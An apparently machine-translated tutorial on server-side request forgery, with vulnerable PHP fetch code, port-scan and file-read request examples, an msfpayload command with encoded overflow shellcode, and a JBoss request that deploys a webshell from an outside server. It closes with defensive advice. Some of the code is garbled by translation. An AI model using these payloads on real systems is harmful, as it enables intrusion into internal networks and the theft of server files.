SSRF Attack overview
Many Web applications provide the ability to get data from other servers. Use the user-specified Url,web app to get pictures, download files, read file contents, and more. This feature, if used maliciously, can exploit a defective Web application as a proxy to attack remote and local servers. This form of attack is called a service-side request forgery attack (Server-side requests forgery).
For example, a typical application that provides this functionality is shown:
If the application does not properly validate and filter the user-supplied URL and the information returned by the remote server, there may be a flaw in this service-side request forgery. Google,facebook,adobe,baidu,tencent and other well-known companies have been found this loophole. There are 5 main types of attacks that attackers can achieve with SSRF:
1. The external network, the server intranet, local port scanning, access to some of the services of the banner information; 2. Attacks run on the intranet or local applications (such as overflow); 3. Fingerprint Identification of intranet Web application, by accessing the default file; 4. Web Applications attacking intranet The main is the use of the get parameters can be implemented attacks (such as struts2,sqli, etc.); 5. Read local files using the file protocol.
Common back-end implementations
SSRF attacks may exist in any language written by the application, we use some PHP implementation of code as a sample analysis. Most of the code comes from the actual application source.
1,php file_get_contents:
1<?PHP2 if(isset($_post[' URL '])) 3 { 4 $content=file_get_contents($_post[' URL ']); 5 $filename= './images/'.Rand().‘; Img1.jpg '; 6 file_put_contents($filename,$content); 7 Echo $_post[' URL ']; 8 $img= "$filename." \ "/>"; 9 } Ten Echo $img; One?>
This code uses the File_get_contents function to obtain a picture from a user-specified URL. Then it is saved with a file name on the hard disk and displayed to the user.
2,php Fsockopen ():
1<?PHP2 functionGetFile ($host,$port,$link) 3 { 4 $fp=Fsockopen($host,intval($port),$errno,$errstr, 30); 5 if(!$fp) { 6 Echo"$errstr(Error number$errno) \ n "; 7}Else { 8 $out= "GET$linkHttp/1.1\r\n "; 9 $out. = "Host:$host\ r \ n "; Ten $out. = "connection:close\r\n\r\n"; One $out. = "\ r \ n"; A fwrite($fp,$out); - $contents= ' '; - while(!feof($fp)) { the $contents.=fgets($fp, 1024); - } - fclose($fp); - return $contents; + } - } +?>
This code uses the Fsockopen function to get the data (file or HTML) that the user has set up the URL. This function uses the socket to establish a TCP connection to the server and transmits the raw data.
3,php curl_exec ():
1<?PHP2 if(isset($_post[' URL ']))3 {4 $link=$_post[' URL '];5 $curlobj=curl_init ();6curl_setopt ($curlobj, Curlopt_post, 0);7curl_setopt ($curlobj, Curlopt_url,$link);8curl_setopt ($curlobj, Curlopt_returntransfer, 1);9 $result=curl_exec ($curlobj);TenCurl_close ($curlobj); One A $filename= './curled/'.Rand().‘. txt; - file_put_contents($filename,$result); - Echo $result; the } -?>
This is another very common implementation. Use curl to get the data.
Attack scenario
In most Web server architectures, the Web server itself can access the Internet and the intranet in which the server resides. Shows where requests from the Web server can be reached.
Port scan
Most social networking sites offer the ability to upload images via a user-specified URL. If the user enters a URL that is not valid. Most web apps will return an error message. An attacker could enter some uncommon but valid URIs, such as
http://example.com:8080/dir/images/http://example.com:22/dir/public/image.jpghttp://example.com:3306/dir/images/
It then determines whether the port is open based on the return information of the server. Most applications do not judge the port, and as long as it is a valid URL, the request is made. Most TCP services send banner information when the socket is established, and the banner information is ASCII encoded and can be presented as raw HTML data. Of course, the server usually does not show directly when processing the return information, but different error codes, the length of the returned information and the return time can be used as the basis to determine the port status of the remote servers.
The following implementation can be used to do a port scan:
1<?PHP2 if(isset($_post[' URL ']))3 {4 $link=$_post[' URL '];5 $filename= './curled/'.Rand().‘ txt;6 $curlobj= Curl_init ($link);7 $fp=fopen($filename, "W");8curl_setopt ($curlobj, Curlopt_file,$fp);9curl_setopt ($curlobj, Curlopt_header, 0);TenCurl_exec ($curlobj); OneCurl_close ($curlobj); A fclose($fp); - $fp=fopen($filename, "R"); - $result=fread($fp,filesize($filename)); the fclose($fp); - Echo $result; - } -?>
The reader can submit the test using the following form (relatively crude ~ ~ ~):
<HTML><Body><formname= "px"Method= "POST"Action= "http://127.0.0.1/ss.php"><inputtype= "text"name= "url"value=""><inputtype= "Submit"name= "Commit"value= "Submit"></form><Script></Script></Body></HTML>
Under normal circumstances, the request Http://www.twitter.com/robots.txt returns the following results:
If a port is requested for a non-HTTP service, for example: Http://scanme.nmap.org:22/test.txt will return banner information
Request closed Port will error: Http://scanme.nmap.org:25/test.txt
Request local MySQL port: http://127.0.0.1:3306/test.txt
Of course, most Internet applications do not return banner information directly. However, it can be judged by the error message, Response time, response packet size, as previously mentioned. Here's a case of Google's Webmaster app that uses the return information to determine the port status. Google has fixed the flaw.
Attacking the application
Intranet security is usually very weak, overflow, weak passwords and so on generally exist. Through the SSRF attack, can achieve the internal network access, thus can attack the intranet or the local machine, obtains the shell and so on.
Here is a small program to demonstrate locally:
Request: Http://127.0.0.1:8987/test.txt
Detected 8987 ports open.
Request:
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Here is the white box analysis, the actual combat time of course not this condition can only use the known loopholes to overflow. Write exp by analysis. Because HTTP is a text-based protocol, there is a problem with processing some Unicode characters that cannot be printed. This is done using Msfencode to encode. The command is as follows:
Msfpayload widnows/exec Cmd=calc.exe R | Msfencode bufferregister=esp-e x86/alpha_mixed
The final payload are as follows:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@ ' ßwtyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0bbabxp8abujiilhhmyupwpwp3pk9he01xrstnkprfplkprtllkpr24nkbr7xdomgszuvvq9oeakpllg L3qql5rflwpiqjodm31jgkrhpabpwnk3bvplksrwlwqzplk1p0xmu9psdcz7qzpf0nkqx6xnk2xups1n3xcgl3ynkednkvayf4qko5akpnliqjo4m31o76xip buztdc3mhxgkamvdbu8bchlkshetgqhsqvlktlrknkshulgqzslk5tlkvazpoy3tgtwtqkqksq0ysjrqyokp2xcosjnkwb8klfqm0jfanmlelyc05pc0ppsx6 Qlk0oowkoyeokhph5920vbhy6meomomkon5uls6sluzmpykip2ufeok3wfs422objs0sc9ozucspapl3sc0aa
Overflow successful, eject calculator.
You may have questions about whether the data sent by HTTP can be received by other server protocols. can refer to cross-protocol communication Technology Utilization
Fingerprint Identification of Intranet Web application
Identifying the frameworks, platforms, modules, and CMS used by intranet applications can provide a lot of help for subsequent attacks. Most Web application frameworks have some unique files and directories. These files can be used to identify the type of application, or even a detailed version. Based on this information, a targeted collection of vulnerabilities can be exploited. For example, you can determine whether phpMyAdmin is installed by accessing the following files:
request:http://127.0.0.1:8080/phpmyadmin/themes/original/img/b_tblimport.pngrequest:http://127.0.0.1:8081/ wp-content/themes/default/images/audio.jpgrequest:http://127.0.0.1:8082/profiles/minimal/translations/ README.txt
Access Http://10.0.0.1/portName.js can determine if it is a dlink router
The following Baidu case from Wooyun, has been repaired. Using Tomcat to identify the server by accessing Http://10.50.33.43:8080/manager/images/tomcat.gif.
Attacking intranet Web applications
There are a number of web attacks that can only be attacked by the Get method, such as Struts2 command execution. Here's a JBoss case where you can deploy Webshell with a GET request.
Just put the network horse on the public network server, and then send this request:
&name=jboss.system:service=maindeployer&methodindex&arg0=http ://our_public_internet_server/utils/cmd.war
Request the Web horse to execute the command by adding parameters: Http://127.0.0.1:8080/cmd/shell.jsp?x=dir
In practice, there is usually no echo, similar to blind hit only.
Read local file
The cases mentioned above are based on HTTP requests. If we specify the file protocol, it is also possible to read the files on the server. The following request will let the app read the local file:
Request: file:///c:/windows/win.ini
The following is a case of adobe that has been fixed. Request for FILE:///ETC/PASSWD
How to Defend
There are usually the following 5 ways of thinking:
1, filtering The return information, verifying the remote server response to the request is an easy way. If the web app is going to get a file of one type. Verify that the returned information meets the criteria before presenting the results to the user.
2, unified error message, to avoid users can be based on error information to determine the port status of the remote server.
3, limit the port of the request to HTTP common port, for example, 80,443,8080,8090.
4, blacklist intranet IP. Avoid application is used to obtain intranet data, attack intranet.
5, disable the unwanted protocol. Only HTTP and HTTPS requests are allowed. Can prevent problems that are similar to file:///,gopher://,ftp://.
Resources
Http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-3.html
http://evilcos.me/?p=2
http://www.wooyun.org
Via riyazwalikar.com compilation by [email protected]
SSRF Attack Instance parsing